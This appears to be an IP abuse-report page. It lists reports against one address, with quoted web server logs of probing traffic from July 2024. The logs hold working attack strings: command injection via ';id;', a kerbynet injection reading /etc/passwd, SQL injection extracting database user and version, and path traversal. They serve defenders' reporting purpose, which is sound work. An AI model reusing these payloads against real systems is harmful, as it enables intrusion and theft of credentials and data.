cmbplf
2024-07-29 03:58:28
(1 month ago)
13.102 requests in 1 hour (6d20h59m)
Brute-Force
Bad Web Bot
URAN Publishing Service
2024-07-25 18:18:45
(1 month ago)
62.210.101.199 - - [25/Jul/2024:21:18:45 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1. ... show more 62.210.101.199 - - [25/Jul/2024:21:18:45 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 404 3018 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
URAN Publishing Service
2024-07-25 15:33:03
(1 month ago)
62.210.101.199 - - [25/Jul/2024:18:33:03 +0300] "GET /cgi-bin/awstats/awredir.pl?url=interact.sh HTT ... show more 62.210.101.199 - - [25/Jul/2024:18:33:03 +0300] "GET /cgi-bin/awstats/awredir.pl?url=interact.sh HTTP/1.1" 404 460 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
URAN Publishing Service
2024-07-25 13:28:02
(1 month ago)
62.210.101.199 - - [25/Jul/2024:16:27:53 +0300] "GET /cgi-bin/videoconfiguration.cgi HTTP/1.1" 404 4 ... show more 62.210.101.199 - - [25/Jul/2024:16:27:53 +0300] "GET /cgi-bin/videoconfiguration.cgi HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
62.210.101.199 - - [25/Jul/2024:16:28:01 +0300] "GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
URAN Publishing Service
2024-07-18 18:17:20
(1 month ago)
62.210.101.199 - - [18/Jul/2024:21:17:20 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1. ... show more 62.210.101.199 - - [18/Jul/2024:21:17:20 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 404 3014 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
URAN Publishing Service
2024-07-18 15:33:15
(1 month ago)
62.210.101.199 - - [18/Jul/2024:18:32:58 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1. ... show more 62.210.101.199 - - [18/Jul/2024:18:32:58 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 404 3024 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
62.210.101.199 - - [18/Jul/2024:18:33:14 +0300] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 404 3022 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
URAN Publishing Service
2024-07-16 05:46:34
(1 month ago)
62.210.101.199 - - [16/Jul/2024:08:46:33 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1. ... show more 62.210.101.199 - - [16/Jul/2024:08:46:33 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 404 456 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
62.210.101.199 - - [16/Jul/2024:08:46:33 +0300] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 404 456 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
URAN Publishing Service
2024-07-14 13:07:37
(1 month ago)
62.210.101.199 - - [14/Jul/2024:16:07:36 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1. ... show more 62.210.101.199 - - [14/Jul/2024:16:07:36 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 404 3365 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
62.210.101.199 - - [14/Jul/2024:16:07:37 +0300] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 404 3364 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
Anonymous
2024-07-12 23:20:50
(1 month ago)
Excessive HTTP/HTTPS connections.
Bad Web Bot
URAN Publishing Service
2024-07-11 18:19:37
(1 month ago)
62.210.101.199 - - [11/Jul/2024:21:19:36 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1. ... show more 62.210.101.199 - - [11/Jul/2024:21:19:36 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 404 3025 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
URAN Publishing Service
2024-07-11 15:23:37
(1 month ago)
62.210.101.199 - - [11/Jul/2024:18:23:25 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1. ... show more 62.210.101.199 - - [11/Jul/2024:18:23:25 +0300] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 404 3029 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
62.210.101.199 - - [11/Jul/2024:18:23:36 +0300] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1" 404 3029 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack
URAN Publishing Service
2024-07-11 14:44:39
(1 month ago)
[Thu Jul 11 17:44:37.958706 2024] [ssl:error] [pid 327167] [client 62.210.101.199:45090] AH02032: Ho ... show more [Thu Jul 11 17:44:37.958706 2024] [ssl:error] [pid 327167] [client 62.210.101.199:45090] AH02032: Hostname 212.111.212.23 provided via SNI and hostname elconf.kpi.ua provided via HTTP have no compatible SSL setup
[Thu Jul 11 17:44:38.098755 2024] [ssl:error] [pid 327161] [client 62.210.101.199:45060] AH02032: Hostname 212.111.212.23 provided via SNI and hostname elconf.kpi.ua provided via HTTP have no compatible SSL setup
[Thu Jul 11 17:44:38.100186 2024] [ssl:error] [pid 327167] [client 62.210.101.199:45076] AH02032: Hostname 212.111.212.23 provided via SNI and hostname elconf.kpi.ua provided via HTTP have no compatible SSL setup
... show less
Web App Attack
10dencehispahard SL
2024-07-09 09:01:49
(2 months ago)
Unauthorized login attempts [ ddos]
Brute-Force
lp
2024-07-06 11:24:22
(2 months ago)
anomaly: tcp_port_scan, 501 > threshold 500, repeats 109642 times since last log, pps 364 of prior s ... show more anomaly: tcp_port_scan, 501 > threshold 500, repeats 109642 times since last log, pps 364 of prior second show less
Port Scan
URAN Publishing Service
2024-07-06 05:47:03
(2 months ago)
62.210.101.199 - - [06/Jul/2024:08:46:59 +0300] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20U ... show more 62.210.101.199 - - [06/Jul/2024:08:46:59 +0300] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 301 777 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
62.210.101.199 - - [06/Jul/2024:08:47:02 +0300] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 301 1000 "http://212.111.212.230:80" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
... show less
Web App Attack